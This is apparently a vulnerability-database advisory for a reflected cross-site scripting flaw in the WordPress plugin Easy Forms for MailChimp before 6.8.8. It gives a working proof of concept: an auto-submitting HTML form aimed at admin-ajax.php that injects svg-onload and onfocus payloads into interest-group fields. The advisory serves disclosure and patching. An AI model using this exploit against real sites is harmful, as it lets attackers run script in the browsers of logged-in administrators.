Lucene search

K
wpexploitWpvulndbWPEX-ID:8F510B8C-B97A-44C9-A36D-2D775A4F7B81
HistoryMar 29, 2023 - 12:00 a.m.

Easy Forms for MailChimp < 6.8.8 - Reflected XSS

2023-03-2900:00:00
wpvulndb
71
mailchimp
easy forms
xss
admin
attacker
code
security vulnerability
cross-site scripting
form submission
interest groups
wordpress plugin

0.001 Low

EPSS

Percentile

31.2%

The plugin does not sanitise and escape some parameters before outputting them back in the response, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Make a logged in admin open a page with the following code (this requires the attacker to know/guess a list_id)

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
        <input type="hidden" name="action" value="add_interest_group_to_form"/>
        <input type="hidden" name="list_id" value="d352660974" />
        <input type="hidden" name="interest_groups[][group_id]" value='"></textarea><svg/onload=alert(/XSS-group_id/)>' />
        <input type="hidden" name="interest_groups[][field_type]" value='"><svg/onload=alert(/XSS-field_type/)>' />
        <input type="hidden" name="interest_groups[][field_name]" value='"><svg/onload=alert(/XSS-field_name/)>' />
        <input type="hidden" name="interest_groups[][classes]" value='"autofocus=autofocus onfocus=alert(/XSS-classes/)//' />
        <input type="submit" value="Submit" />
    </form>
  </body>
</html>

0.001 Low

EPSS

Percentile

31.2%

Related for WPEX-ID:8F510B8C-B97A-44C9-A36D-2D775A4F7B81